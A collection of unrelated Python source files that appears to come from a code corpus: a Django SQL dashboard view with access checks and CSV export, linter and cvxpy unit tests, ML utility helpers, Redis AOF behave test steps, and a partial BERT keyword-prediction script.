provided_values = {
key: value for key, value in parameter_values.items() if value.strip()
}
if provided_values:
if len(provided_values) == 1:
html_title += ": {}".format(list(provided_values.values())[0])
else:
html_title += ": {}".format(
", ".join(
"{}={}".format(key, value) for key, value in provided_values.items()
)
)
user_can_execute_sql = request.user.has_perm("django_sql_dashboard.execute_sql")
saved_dashboards = []
if not dashboard:
# Only show saved dashboards on index page
saved_dashboards = [
(dashboard, dashboard.user_can_edit(request.user))
for dashboard in Dashboard.get_visible_to_user(request.user).select_related(
"owned_by", "view_group", "edit_group"
)
]
context = {
"title": title or "SQL Dashboard",
"html_title": html_title,
"query_results": query_results,
"unverified_sql_queries": unverified_sql_queries,
"available_tables": available_tables,
"description": description,
"dashboard": dashboard,
"saved_dashboard": bool(dashboard),
"user_owns_dashboard": dashboard and request.user == dashboard.owned_by,
"user_can_edit_dashboard": dashboard and dashboard.user_can_edit(request.user),
"user_can_execute_sql": user_can_execute_sql,
"user_can_export_data": getattr(settings, "DASHBOARD_ENABLE_FULL_EXPORT", None)
and user_can_execute_sql,
"parameter_values": parameter_values.items(),
"too_long_so_use_post": too_long_so_use_post,
"saved_dashboards": saved_dashboards,
}
if extra_context:
context.update(extra_context)
response = render(
request,
template,
context,
)
if request.user.is_authenticated:
response["cache-control"] = "private"
response["Content-Security-Policy"] = "frame-ancestors 'self'"
return response
def dashboard(request, slug):
dashboard = get_object_or_404(Dashboard, slug=slug)
# Can current user see it, based on view_policy?
view_policy = dashboard.view_policy
owner = dashboard.owned_by
denied = HttpResponseForbidden("You cannot access this dashboard")
denied["cache-control"] = "private"
if view_policy == Dashboard.ViewPolicies.PRIVATE:
if request.user != owner:
return denied
elif view_policy == Dashboard.ViewPolicies.LOGGEDIN:
if not request.user.is_authenticated:
return denied
elif view_policy == Dashboard.ViewPolicies.GROUP:
if (not request.user.is_authenticated) or not (
request.user == owner
or request.user.groups.filter(pk=dashboard.view_group_id).exists()
):
return denied
elif view_policy == Dashboard.ViewPolicies.STAFF:
if (not request.user.is_authenticated) or (
request.user != owner and not request.user.is_staff
):
return denied
elif view_policy == Dashboard.ViewPolicies.SUPERUSER:
if (not request.user.is_authenticated) or (
request.user != owner and not request.user.is_superuser
):
return denied
return _dashboard_index(
request,
sql_queries=[query.sql for query in dashboard.queries.all()],
title=dashboard.title,
description=dashboard.description,
dashboard=dashboard,
template="django_sql_dashboard/saved_dashboard.html",
)
non_alpha_re = re.compile(r"[^a-zA-Z0-9]")
def export_sql_results(request):
export_key = [k for k in request.POST.keys() if k.startswith("export_")][0]
_, format, sql_index = export_key.split("_")
assert format in ("csv", "tsv")
sqls = request.POST.getlist("sql")
sql = sqls[int(sql_index)]
parameter_values = {
parameter: request.POST.get(parameter, "")
for parameter in extract_named_parameters(sql)
}
alias = getattr(settings, "DASHBOARD_DB_ALIAS", "dashboard")
# Decide on filename
sql_hash = hashlib.sha256(sql.encode("utf-8")).hexdigest()[:6]
filename = non_alpha_re.sub("-", sql.lower()[:30]) + sql_hash
filename_plus_ext = filename + "." + format
connection = connections[alias]
connection.cursor() # To initialize connection
cursor = connection.create_cursor(name="c" + filename.replace("-", "_"))
csvfile = StringIO()
csvwriter = csv.writer(
csvfile,
dialect={
"csv": csv.excel,
"tsv": csv.excel_tab,
}[format],
)
def read_and_flush():
csvfile.seek(0)
data = csvfile.read()
csvfile.seek(0)
csvfile.truncate()
return data
def rows():
try:
cursor.execute(sql, parameter_values)
done_header = False
while True:
records = cursor.fetchmany(size=2000)
if not done_header:
csvwriter.writerow([r.name for r in cursor.description])
yield read_and_flush()
done_header = True
if not records:
break
for record in records:
csvwriter.writerow(record)
yield read_and_flush()
finally:
cursor.close()
response = StreamingHttpResponse(
rows(),
content_type={
"csv": "text/csv",
"tsv": "text/tab-separated-values",
}[format],
)
response["Content-Disposition"] = 'attachment; filename="' + filename_plus_ext + '"'
return response
|
<reponame>ebursztein/SiteFab
# encoding: utf-8
from .utils import get_linter_errors_list
def test_e104_triggered(sitefab, empty_post):
empty_post.meta.mylist = ["test", "test"]
results = sitefab.linter.lint(empty_post, "", sitefab)
error_list = get_linter_errors_list(results)
assert "E104" in error_list
def test_e104_not_triggered(sitefab, empty_post):
empty_post.meta.mylist = ["test"]
results = sitefab.linter.lint(empty_post, "", sitefab)
error_list = get_linter_errors_list(results)
assert "E104" not in error_list
def test_e105_triggered(sitefab, empty_post):
empty_post.meta.tags = ["tag1", "category", "tag2"]
empty_post.meta.category = "category"
results = sitefab.linter.lint(empty_post, "", sitefab)
error_list = get_linter_errors_list(results)
assert "E105" in error_list
def test_e105_not_triggered(sitefab, empty_post):
empty_post.meta.tags = ["tag1", "tag4", "tag2"]
empty_post.meta.category = "category"
results = sitefab.linter.lint(empty_post, "", sitefab)
error_list = get_linter_errors_list(results)
assert "E105" not in error_list
def test_e106_triggered(sitefab, empty_post):
empty_post.meta.title = "title with extra space"
results = sitefab.linter.lint(empty_post, "", sitefab)
error_list = get_linter_errors_list(results)
assert "E106" in error_list
def test_e106_not_triggered(sitefab, empty_post):
empty_post.meta.title = "title with no extra space"
results = sitefab.linter.lint(empty_post, "", sitefab)
error_list = get_linter_errors_list(results)
assert "E106" not in error_list
def test_e107_triggered(sitefab, empty_post):
empty_post.meta.authors = "this is not a list"
results = sitefab.linter.lint(empty_post, "", sitefab)
error_list = get_linter_errors_list(results)
assert "E107" in error_list
def test_e107_not_triggered(sitefab, empty_post):
empty_post.meta.authors = ['<NAME>', '<NAME>']
results = sitefab.linter.lint(empty_post, "", sitefab)
error_list = get_linter_errors_list(results)
assert "E107" not in error_list
def test_e108_triggered(sitefab, empty_post):
empty_post.meta.authors = ['<NAME>', 'No Commas']
results = sitefab.linter.lint(empty_post, "", sitefab)
error_list = get_linter_errors_list(results)
assert "E108" in error_list
def test_e108_not_triggered(sitefab, empty_post):
empty_post.meta.authors = ['<NAME>',
'<NAME>', '<NAME>']
results = sitefab.linter.lint(empty_post, "", sitefab)
error_list = get_linter_errors_list(results)
assert "E108" not in error_list
def test_e109_triggered(sitefab, empty_post):
empty_post.meta.authors = ['<NAME>', 'not, Capitalized']
results = sitefab.linter.lint(empty_post, "", sitefab)
error_list = get_linter_errors_list(results)
assert "E109" in error_list
def test_e109_not_triggered(sitefab, empty_post):
empty_post.meta.authors = ['<NAME>', 'Celine, Bursztein']
results = sitefab.linter.lint(empty_post, "", sitefab)
error_list = get_linter_errors_list(results)
assert "E109" not in error_list
def test_e110_triggered(sitefab, empty_post):
empty_post.meta.category = "not Lower"
results = sitefab.linter.lint(empty_post, "", sitefab)
error_list = get_linter_errors_list(results)
assert "E110" in error_list
def test_e110_not_triggered(sitefab, empty_post):
empty_post.meta.category = "lower"
results = sitefab.linter.lint(empty_post, "", sitefab)
error_list = get_linter_errors_list(results)
assert "E110" not in error_list
def test_e112_triggered(sitefab, empty_post):
empty_post.meta.files = "not Lower"
results = sitefab.linter.lint(empty_post, "", sitefab)
error_list = get_linter_errors_list(results)
assert "E112" in error_list
def test_e112_not_triggered(sitefab, empty_post):
empty_post.meta.files = {"pdf": "/test/test.pdf"}
results = sitefab.linter.lint(empty_post, "", sitefab)
error_list = get_linter_errors_list(results)
assert "E112" not in error_list
def test_e113_triggered(sitefab, empty_post):
values = [53, ['bla'], {'bla': 'oups'}, None]
for value in values:
empty_post.meta.banner = value
results = sitefab.linter.lint(empty_post, "", sitefab)
error_list = get_linter_errors_list(results)
assert "E113" in error_list
def test_e113_not_triggered(sitefab, empty_post):
values = ["test", u"test", "", u""]
for value in values:
empty_post.meta.banner = value
results = sitefab.linter.lint(empty_post, "", sitefab)
error_list = get_linter_errors_list(results)
assert "E113" not in error_list
def test_e114_triggered(sitefab, empty_post):
test_values = [
"http://",
"https://" # empty
"hTTps://elie.net", # caps
"https://elie.net/ test.html" # space
]
for value in test_values:
empty_post.meta.banner = value
results = sitefab.linter.lint(empty_post, "", sitefab)
error_list = get_linter_errors_list(results)
assert "E114" in error_list
def test_e114_not_triggered(sitefab, empty_post):
test_values = [
"http://www.elie.net",
"https://www.elie.net",
"https://www.elie.net/test.html",
"https://www.elie.net/test/test.html",
"https://www.elie.net/test/test",
"https://www.elie.net/test/test.pdf",
"https://www.elie.net/test/test.pdf?a=42",
"/cat/file",
"cat/file",
"/cat/file.pdf"
"/cat/file.pdf?a=2"
]
for value in test_values:
empty_post.meta.banner = value
results = sitefab.linter.lint(empty_post, "", sitefab)
error_list = get_linter_errors_list(results)
assert "E114" not in error_list
def test_e115_triggered(sitefab, empty_post):
test_values = [
"file .pdf",
]
for value in test_values:
empty_post.meta.banner = value
results = sitefab.linter.lint(empty_post, "", sitefab)
error_list = get_linter_errors_list(results)
assert "E115" in error_list
def test_e115_not_triggered(sitefab, empty_post):
test_values = [
"file.pdf",
"/file.pdf",
"/files/file.pdf",
"/file/file-test.pdf",
"/file/file-test02.jpeg",
]
for value in test_values:
empty_post.meta.banner = value
results = sitefab.linter.lint(empty_post, "", sitefab)
error_list = get_linter_errors_list(results)
assert "E115" not in error_list
def test_e116_triggered(sitefab, empty_post):
empty_post.meta.title = None
results = sitefab.linter.lint(empty_post, "", sitefab)
error_list = get_linter_errors_list(results)
assert "E116" in error_list
def test_e116_not_triggered(sitefab, empty_post):
empty_post.meta.title = "this is my title"
results = sitefab.linter.lint(empty_post, "", sitefab)
error_list = get_linter_errors_list(results)
assert "E116" not in error_list
def test_e117_triggered(sitefab, empty_post):
values = [53, ['bla'], {'bla': 'oups'}, None]
for value in values:
empty_post.meta.permanent_url = value
results = sitefab.linter.lint(empty_post, "", sitefab)
error_list = get_linter_errors_list(results)
assert "E117" in error_list
def test_e117_not_triggered(sitefab, empty_post):
values = ["test", u"test" u"", ""]
for value in values:
empty_post.meta.permanent_url = value
results = sitefab.linter.lint(empty_post, "", sitefab)
error_list = get_linter_errors_list(results)
assert "E117" not in error_list
def test_e118_triggered(sitefab, empty_post):
values = [
"http://",
"https://" # empty
"hTTps://elie.net", # caps
"https://elie.net/ test.html" # space
]
for value in values:
empty_post.meta.permanent_url = value
results = sitefab.linter.lint(empty_post, "", sitefab)
error_list = get_linter_errors_list(results)
assert "E118" in error_list
def test_e118_not_triggered(sitefab, empty_post):
test_values = [
"/cat/file",
"/cat/file?a=5"
"/cat/file.pdf",
""
]
for value in test_values:
empty_post.meta.permanent_url = value
results = sitefab.linter.lint(empty_post, "", sitefab)
error_list = get_linter_errors_list(results)
assert "E118" not in error_list
def test_e119_triggered(sitefab, empty_post):
values = ["notabsolute", "not/absolute/not"]
for value in values:
empty_post.meta.permanent_url = value
results = sitefab.linter.lint(empty_post, "", sitefab)
error_list = get_linter_errors_list(results)
assert "E119" in error_list
def test_e119_not_triggered(sitefab, empty_post):
values = ["/absolute", "/absolute/not"]
for value in values:
empty_post.meta.permanent_url = value
results = sitefab.linter.lint(empty_post, "", sitefab)
error_list = get_linter_errors_list(results)
assert "E119" not in error_list
def test_e120_triggered(sitefab, empty_post):
import pprint
empty_post.meta.template = "blog_post"
values = ["wrong", "wrong/again"]
for value in values:
empty_post.meta.permanent_url = value
pprint.pprint(empty_post)
results = sitefab.linter.lint(empty_post, "", sitefab)
error_list = get_linter_errors_list(results)
assert "E120" in error_list
def test_e120_not_triggered(sitefab, empty_post):
empty_post.meta.template = "blog_post"
values = ["/blog/ok", "/blog/ok/as", "/blog/ok/as.well"]
for value in values:
empty_post.meta.permanent_url = value
results = sitefab.linter.lint(empty_post, "", sitefab)
error_list = get_linter_errors_list(results)
assert "E120" not in error_list
def test_e121_triggered(sitefab, empty_post):
values = [{"not a valid type": "myslide"}]
for value in values:
empty_post.meta.files = value
results = sitefab.linter.lint(empty_post, "", sitefab)
error_list = get_linter_errors_list(results)
assert "E121" in error_list
def test_e121_not_triggered(sitefab, empty_post):
values = [{"slides": "myslide"}, {
"paper": "mypaper"}, {"video": "myvideo"}]
for value in values:
empty_post.meta.files = value
results = sitefab.linter.lint(empty_post, "", sitefab)
error_list = get_linter_errors_list(results)
assert "E121" not in error_list
def test_e122_triggered(sitefab, empty_post):
values = [{"not a valid type": "not a valid file"}]
for value in values:
empty_post.meta.files = value
results = sitefab.linter.lint(empty_post, "", sitefab)
error_list = get_linter_errors_list(results)
assert "E122" in error_list
def test_e122_not_triggered(sitefab, empty_post):
values = [{"slides": "/myslide.pdf"}, {"video": "/files/myvideo.mp4"}]
for value in values:
empty_post.meta.files = value
results = sitefab.linter.lint(empty_post, "", sitefab)
error_list = get_linter_errors_list(results)
assert "E122" not in error_list
def test_e123_triggered(sitefab, empty_post):
values = [{"not a valid type": "/baprefix",
"video": "files/almostcorrect"}]
for value in values:
empty_post.meta.files = value
results = sitefab.linter.lint(empty_post, "", sitefab)
error_list = get_linter_errors_list(results)
assert "E123" in error_list
def test_e123_not_triggered(sitefab, empty_post):
values = [{"slides": "/files/myslide.pdf"},
{"video": "/files/myvideo.mp4"}]
for value in values:
empty_post.meta.files = value
results = sitefab.linter.lint(empty_post, "", sitefab)
error_list = get_linter_errors_list(results)
assert "E123" not in error_list
def test_e124_triggered(sitefab, empty_post):
values = [{"not a valid type": "/nosuffix.pdf",
"video": "files/almostcorrect.pdf"},
{"video": "htt://whateverr/files/myvideo.mp4"}]
for value in values:
empty_post.meta.files = value
results = sitefab.linter.lint(empty_post, "", sitefab)
error_list = get_linter_errors_list(results)
assert "E124" in error_list
def test_e124_not_triggered(sitefab, empty_post):
values = [{"slides": "/files/myfiles-slides.pdf"},
{"video": "https://whateverr/files/myvideo.mp4"}]
for value in values:
empty_post.meta.files = value
results = sitefab.linter.lint(empty_post, "", sitefab)
error_list = get_linter_errors_list(results)
assert "E124" not in error_list
|
<reponame>gabrielhartmann/cvxpy
"""
Copyright 2013 <NAME>, <NAME>
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
import cvxpy as cvx
import numpy as np
import cvxpy.settings as s
from cvxpy.tests.base_test import BaseTest
from cvxpy.reductions.solvers.defines \
import INSTALLED_SOLVERS
MIP_SOLVERS = [cvx.ECOS_BB, cvx.GUROBI, cvx.MOSEK]
class TestMIPVariable(BaseTest):
""" Unit tests for the expressions/shape module. """
def setUp(self):
self.x_bool = cvx.Variable(boolean=True)
self.y_int = cvx.Variable(integer=True)
self.A_bool = cvx.Variable((3, 2), boolean=True)
self.B_int = cvx.Variable((2, 3), integer=True)
# Check for all installed QP solvers
self.solvers = [x for x in MIP_SOLVERS if x in INSTALLED_SOLVERS]
def test_mip_consistency(self):
"""Test that MIP problems are deterministic.
"""
data_recs = []
result_recs = []
for i in range(5):
obj = cvx.Minimize(cvx.square(self.y_int - 0.2))
p = cvx.Problem(obj, [self.A_bool == 0, self.x_bool == self.B_int])
data_recs.append(p.get_problem_data(cvx.ECOS_BB))
# result_recs.append( p.solve() )
# Check that problem data and result is always the same.
for i in range(1, 5):
# self.assertEqual(result_recs[0], result_recs[i])
for key in ["c", "A", "b", "G", "h",
"bool_vars_idx", "int_vars_idx"]:
lh_item = data_recs[0][0][key]
rh_item = data_recs[i][0][key]
if key in ["A", "G"]:
lh_item = lh_item.todense()
rh_item = rh_item.todense()
self.assertItemsAlmostEqual(lh_item, rh_item)
# def test_mip_print(self):
# """Test to string methods for Bool/Int vars.
# """
# self.assertEqual(repr(self.x_bool), "Bool(1, 1)")
# self.assertEqual(repr(self.B_int), "Int(2, 3)")
def test_all_solvers(self):
for solver in self.solvers:
self.bool_prob(solver)
self.int_prob(solver)
self.bool_socp(solver)
self.int_socp(solver)
def bool_prob(self, solver):
# Bool in objective.
obj = cvx.Minimize(cvx.square(self.x_bool - 0.2))
p = cvx.Problem(obj,[])
result = p.solve(solver=solver)
self.assertAlmostEqual(result, 0.04)
self.assertAlmostEqual(self.x_bool.value, 0)
# Bool in constraint.
t = cvx.Variable()
obj = cvx.Minimize(t)
p = cvx.Problem(obj,[cvx.square(self.x_bool) <= t])
result = p.solve(solver=solver)
self.assertAlmostEqual(result, 0)
self.assertAlmostEqual(self.x_bool.value, 0, places=4)
# Matrix Bool in objective.
C = np.array([[0, 1, 0], [1, 1, 1]]).T
obj = cvx.Minimize(cvx.sum_squares(self.A_bool - C))
p = cvx.Problem(obj,[])
result = p.solve(solver=solver)
self.assertAlmostEqual(result, 0)
self.assertItemsAlmostEqual(self.A_bool.value, C, places=4)
# Matrix Bool in constraint.
t = cvx.Variable()
obj = cvx.Minimize(t)
p = cvx.Problem(obj, [cvx.sum_squares(self.A_bool - C) <= t])
result = p.solve(solver=solver)
self.assertAlmostEqual(result, 0)
self.assertItemsAlmostEqual(self.A_bool.value, C, places=4)
def int_prob(self, solver):
# Int in objective.
obj = cvx.Minimize(cvx.square(self.y_int - 0.2))
p = cvx.Problem(obj,[])
result = p.solve(solver=solver)
self.assertAlmostEqual(result, 0.04)
self.assertAlmostEqual(self.y_int.value, 0)
# Infeasible integer problem
obj = cvx.Minimize(0)
p = cvx.Problem(obj, [self.y_int == 0.5])
result = p.solve(solver=solver)
self.assertEqual(p.status in s.INF_OR_UNB, True)
def int_socp(self, solver):
# Int in objective.
t = cvx.Variable()
obj = cvx.Minimize(t)
p = cvx.Problem(obj, [cvx.square(self.y_int - 0.2) <= t])
result = p.solve(solver=solver)
self.assertAlmostEqual(result, 0.04)
self.assertAlmostEqual(self.y_int.value, 0)
def bool_socp(self, solver):
# Int in objective.
t = cvx.Variable()
obj = cvx.Minimize(t)
p = cvx.Problem(obj, [cvx.square(self.x_bool - 0.2) <= t])
result = p.solve(solver=solver)
self.assertAlmostEqual(result, 0.04)
self.assertAlmostEqual(self.x_bool.value, 0)
|
from os import listdir, path
from glob import glob
from datetime import datetime
from subprocess import Popen, PIPE, run
from multiprocessing import cpu_count
from pathlib import Path
from typing import Dict
import pandas as pd
import torch
import logging
HOME_DIR = str(Path.home())
INIT_TIME = datetime.now().strftime('%e-%m-%y_%H-%M-%S').lstrip()
def init_logger(name=None, path=None, screen=True):
if name is None:
name = __name__
logger = logging.getLogger(name)
logger.setLevel(logging.INFO)
formatter = logging.Formatter('{asctime} - {message}', datefmt="%H:%M:%S", style="{")
if path:
Path(path).mkdir(parents=True, exist_ok=True)
file_handler = logging.FileHandler(f"{path}/{name}-{INIT_TIME}.log")
file_handler.setFormatter(formatter)
logger.addHandler(file_handler)
if screen:
screen_handler = logging.StreamHandler()
screen_handler.setFormatter(formatter)
logger.addHandler(screen_handler)
return logger
def get_free_gpu():
if torch.cuda.is_available():
gpu_output = Popen(["nvidia-smi", "-q", "-d", "PIDS"], stdout=PIPE, text=True)
gpu_processes = Popen(["grep", "Processes"], stdin=gpu_output.stdout, stdout=PIPE, text=True)
gpu_output.stdout.close()
processes_output = gpu_processes.communicate()[0]
for i, line in enumerate(processes_output.strip().split("\n")):
if line.endswith("None"):
print(f"Found Free GPU ID: {i}")
cuda_device = f"cuda:{i}"
torch.cuda.set_device(cuda_device)
return torch.device(cuda_device)
print("WARN - No Free GPU found! Running on CPU instead...")
return torch.device("cpu")
def count_num_cpu_gpu():
if torch.cuda.is_available():
num_gpu_cores = torch.cuda.device_count()
num_cpu_cores = (cpu_count() // num_gpu_cores // 2) - 1
else:
num_gpu_cores = 0
num_cpu_cores = (cpu_count() // 2) - 1
return num_cpu_cores, num_gpu_cores
class StreamToLogger:
"""
Fake file-like stream object that redirects writes to a logger instance.
written by: <NAME>
https://www.electricmonk.nl/log/2011/08/14/redirect-stdout-and-stderr-to-a-logger-in-python/
"""
def __init__(self, logger, log_level=logging.INFO):
self.logger = logger
self.log_level = log_level
self.linebuf = ''
def write(self, buf):
for line in buf.rstrip().splitlines():
self.logger.log(self.log_level, line.rstrip())
def save_predictions(folder, sample_idx_list, predictions_list, true_list, correct_list, class_probs, name):
df_dict = {
"sample_index": sample_idx_list,
"prediction": predictions_list,
"true": true_list,
"correct": correct_list,
}
df_dict.update({f"class_{i}_prob": class_i_prob for i, class_i_prob in enumerate(class_probs)})
df = pd.DataFrame.from_dict(df_dict)
df = df.set_index("sample_index").sort_index()
df.to_csv(f"{folder}/{name}-predictions.csv")
class GoogleDriveHandler:
def __init__(self,
local_root: str = f"{HOME_DIR}/GoogleDrive",
drive_binary: str = f"{HOME_DIR}/bin/go/packages/bin/drive",
default_timeout: int = 600):
self.local_root = local_root
self.drive_binary = drive_binary
self.default_args = ["-no-prompt"]
self.default_timeout = default_timeout
def _execute_drive_cmd(self, subcommand: str, path: str, cmd_args: list):
if subcommand not in ("pull", "push"):
raise ValueError("Only pull and push commands are currently supported")
cmd = [self.drive_binary, subcommand] + self.default_args + cmd_args + [path]
cmd_return = run(cmd, capture_output=True, text=True, timeout=self.default_timeout, cwd=HOME_DIR)
return cmd_return.returncode, cmd_return.stdout, cmd_return.stderr
def push_files(self, path: str, cmd_args: list = []):
try:
push_return = self._execute_drive_cmd("push", path, ["-files"] + cmd_args)
if push_return[0] == 0:
message = f"Successfully pushed results to Google Drive: {path}"
else:
message = f"Failed to push results to Google Drive: {path}\nExit Code: {push_return[0]}\nSTDOUT: {push_return[1]}\nSTDERR: {push_return[2]}"
except Exception as e:
message = f"ERROR: {e}\nFailed to push results to Google Drive: {path}"
return message
def pull_files(self, path: str, cmd_args: list = []):
return self._execute_drive_cmd("pull", path, ["-files"] + cmd_args)
def get_checkpoint_file(ckpt_dir: str):
for file in sorted(listdir(ckpt_dir)):
if file.endswith(".ckpt"):
return f"{ckpt_dir}/{file}"
else:
return None
def find_latest_model_checkpoint(models_dir: str):
model_ckpt = None
while not model_ckpt:
model_versions = sorted(glob(models_dir), key=path.getctime)
if model_versions:
latest_model = model_versions.pop()
model_ckpt_dir = f"{latest_model}/checkpoints"
model_ckpt = get_checkpoint_file(model_ckpt_dir)
else:
raise FileNotFoundError(f"Couldn't find a model checkpoint in {models_dir}")
return model_ckpt
def print_final_metrics(name: str, metrics: Dict, logger=None):
if logger:
logger.info(f"{name} Metrics:")
for metric, val in metrics.items():
logger.info(f"{metric}: {val:.4f}")
logger.info("\n")
else:
print(f"{name} Metrics:")
for metric, val in metrics.items():
print(f"{metric}: {val:.4f}")
print()
|
import os
import sys
import time
import redis
import random
import subprocess
from redisrollforward.redis_aof_read import redis_aof_read
from redisrollforward.redis_aof_funnel import redis_aof_funnel
from behave import given, when, then, step # a@UnresolvedImport @UnusedImport
from datetime import datetime
# Get environment variables
try:
bDeleteTestData = os.getenv('DeleteTestData') == 'True'
except:
bDeleteTestData = True
# Globals
cAmberEclipseWorkspace = os.getenv('AmberEclipseWorkspace')
if sys.platform == 'win32':
cRedisStartupCommand = os.path.join(cAmberEclipseWorkspace, '.metadata/.plugins/org.eclipse.debug.core/.launches/tools/Redis-Msdn-2.6_alpha_x64/redis-server.exe')
else:
cRedisStartupCommand = 'redis-server'
cTestdir = os.path.join(cAmberEclipseWorkspace, 'py-redisrollforward/features/steps')
cTestConfigdir = os.path.join(cTestdir, 'config')
cTestdataDir = os.path.join(cTestdir, 'testdata')
cRedisSrcConfig = os.path.join(cTestConfigdir, 'redis.conf')
cRedisDstConfig = os.path.join(cTestdataDir, 'redis.conf')
cAofBackupDir = os.path.join(cTestdataDir, '127.0.0.1', datetime.now().strftime('%Y-%m-%d'))
# Helper functions
def ScrambleString(cIP):
return ''.join(random.sample(cIP, len(cIP)))
def RemoveDirWithContents(cDirIP):
for root, dirs, files in os.walk(cDirIP, topdown=False):
for name in files:
os.remove(os.path.join(root, name))
for name in dirs:
os.rmdir(os.path.join(root, name))
os.rmdir(cDirIP)
def ConfigCopyAndUpdate(cRedisSrcConfigIP, cRedisDstConfigIP, cTestdataDirIP):
'''Config the original config of a redis instance to the workdir and update the appendonly settings'''
with open(cRedisSrcConfigIP, 'rb') as oRead, open(cRedisDstConfigIP, 'wb') as oWrite:
for cLine in oRead:
if len(cLine.rstrip()) > 0 and not cLine.startswith('#'):
tLine = cLine.split()
cPropertyName = tLine[0]
if cPropertyName == 'logfile':
cLine = 'logfile %s\n' % os.path.join(cTestdataDirIP, 'redis_6379.log')
elif cPropertyName == 'pidfile':
cLine = 'pidfile %s\n' % os.path.join(cTestdataDirIP, 'redis_6379.pid')
elif cPropertyName == 'dir':
cLine = 'dir %s\n' % cTestdataDirIP
oWrite.write(cLine)
def Teardown(context):
context.oRedisClient.shutdown()
open(os.path.join(cTestdataDir, 'clientdisconnect_%s.trg' % os.getpid()), 'wb').close()
context.oRedisAofFunnel.ServerStop()
time.sleep(1.0)
context.oRedisAofRead.ClientStop()
context.oRedisAofRead.oLog.handlers[0].close()
context.oRedisAofFunnel.oLog.handlers[0].close()
# Stopping aof_read and aof_funnel takes some time, so wait
time.sleep(1.0)
if bDeleteTestData:
RemoveDirWithContents(cTestdataDir)
# Feature steps
@given(u'there is a redis instance with AOF persistence that logs every write operation received by the server')
def StartRedisDb(context):
# Shutdown the default redis db if running
context.oRedisClient = redis.StrictRedis('localhost', 45321)
context.oRedisClient.shutdown()
time.sleep(1.0)
# First reset testdata dir
if os.path.isdir(cTestdataDir):
RemoveDirWithContents(cTestdataDir)
os.makedirs(cTestdataDir)
# Redis Db copy and prepare
ConfigCopyAndUpdate(cRedisSrcConfig, cRedisDstConfig, cTestdataDir)
subprocess.Popen([cRedisStartupCommand, cRedisDstConfig])
# Wait a short moment for the redis instance to boot
time.sleep(0.5)
@given(u'there is a running redis_aof_read client')
def StartRedisAofRead(context):
context.oRedisAofRead = redis_aof_read(os.path.join(cTestConfigdir, 'test_aof_read.json'), bVerboseIP = True)
context.oRedisAofRead.ClientStart()
@given(u'there is a running redis_aof_funnel server')
def StartRedisAofFunnel(context):
context.oRedisAofFunnel = redis_aof_funnel(os.path.join(cTestConfigdir, 'test_aof_funnel.json'), bVerboseIP = True)
context.oRedisAofFunnel.ServerStart()
@when(u'I make a change in the Redis database')
def ApplyChangeInRedisDb(context):
tKey = ('aapjes', 'nootjes', 'miesjes', 'schaapjes')
context.oRedisClient.set(tKey[random.randrange(len(tKey))], ScrambleString(tKey[random.randrange(len(tKey))]))
@when(u'repeat \'I make a change in the Redis database\' {iAmountIP:n} times while waiting {iSecondIP:n} second each turn')
def RepeatApplyChangeInRedisDb(context, iAmountIP, iSecondIP):
iRepetition = 0
while iRepetition <= iAmountIP:
context.execute_steps(u'When I make a change in the Redis database')
iRepetition += 1
time.sleep(iSecondIP)
time.sleep(1.0)
@then(u'I see {iFileCountIP:n} archived files in the backup folder')
def AssertArchivedFileCount(context, iFileCountIP):
tFilename = [cFile for _root, _dir, tFiles in os.walk(cAofBackupDir) for cFile in tFiles]
iNumFiles = len(tFilename)
Teardown(context)
# Count the aofchunk files in the testdata aofbackup folder
assert iNumFiles == iFileCountIP, 'Got %s Expected %s' % (iNumFiles, iFileCountIP)
#EOF
|
import pandas as pd
import os
import json
import tldextract
import nltk
import multiprocessing
import time
import numpy as np
import networkx as nx
import pke
import random
from tqdm import tqdm
from difflib import SequenceMatcher
from bs4 import BeautifulSoup
from base64 import urlsafe_b64decode
from collections import Counter
# This file is used to test the pretrained BERT, by generating predictions
# on a few websites stored in test_urls.txt. This file should contain urls
# which are different than the ones used to train BERT.
use_html_adjustment = False
bert_dir = 'bert_cased'
bert_data_dir = 'AL_data_store/test' #contains test.json
web_output_dir = 'AL_web_output'
max_predictions = 20 # max number of predictions printed
max_keyword_length = 35
importance_threshold = 0.005 # Minimum probability mass threshold considered
predict_batch_size = 256
max_seq_length = 512
doc_stride = 128
# TODO: Change network num (after training) to -1, and change actually_predict to True in global_domain_predictions
# best network = 13/14
def predict_text_packet(text_packet_list, actually_predict = True, network_num = -1):
# This function takes as input a list of text_packets and returns a
# dictionary mapping text_packets to a list of (predicted_keyword, weight)
# tuples.
output_directory_num = 13
if actually_predict:
text_packet_dataframe = pd.DataFrame(
{'text_packet': text_packet_list})
df_to_json(
text_packet_dataframe,
os.path.join(bert_data_dir, 'test.json'),
testing_mode=True)
# This command runs the prediction, and outputs to
# outputs/n/nbest_predictions.json
predict_cmd = '''
export BERT_DIR={}
python run_squad.py \
--vocab_file=$BERT_DIR/vocab.txt \
--bert_config_file=$BERT_DIR/bert_config.json \
--init_checkpoint=$BERT_DIR/bert_model.ckpt \
--do_train=False \
--do_predict=True \
--predict_file={}/test.json \
--max_seq_length={} \
--doc_stride={} \
--output_dir=outputs/{} \
--use_tpu=False \
--version_2_with_negative=True \
--predict_batch_size={} \
'''.format(bert_dir, bert_data_dir, max_seq_length, doc_stride, output_directory_num, predict_batch_size)
os.system(predict_cmd)
output_dict = json.load(
open(
'outputs/{}/nbest_predictions.json'.format(output_directory_num),
'r'))
for text_packet, prediction in output_dict.items():
for i in range(len(prediction)):
# Ignore start and end logits
prediction[i] = (prediction[i]['text'], prediction[i]['probability'])
return output_dict
def calculate_keyword_mass(data):
# To each keyword, we assign a probability "mass" which sums over its
# predicted probabilities in all the text_packets. We select keywords
# in the order of greatest to least "mass". This function takes the raw
# data outputted by predict_text_packet and returns a sorted list [('key1',
# 0.1), ('key2', 0.2), ('key3', 0.0)]. The similarity_threshold is the threshold for similarity matrix -> adjacency matrix.
print('Calculating Probability mass')
# Initalize all keywords to mass 0.0
all_keywords = set.union(*[set(elem[0] for elem in v) for v in data.values()])
keyword_prob_mass = dict.fromkeys(all_keywords, 0.0)
for text_packet, keyword_dict in tqdm(data.items()):
for keyword, prob in keyword_dict:
if keyword and prob > importance_threshold:
if len(keyword) <= max_keyword_length:
keyword_prob_mass[keyword] += prob
else:
# For keywords greater than the max keyword length, we distribute
# thier probability evenly across all viable candidates contained within them.
related_keywords = set()
for k, p in keyword_dict:
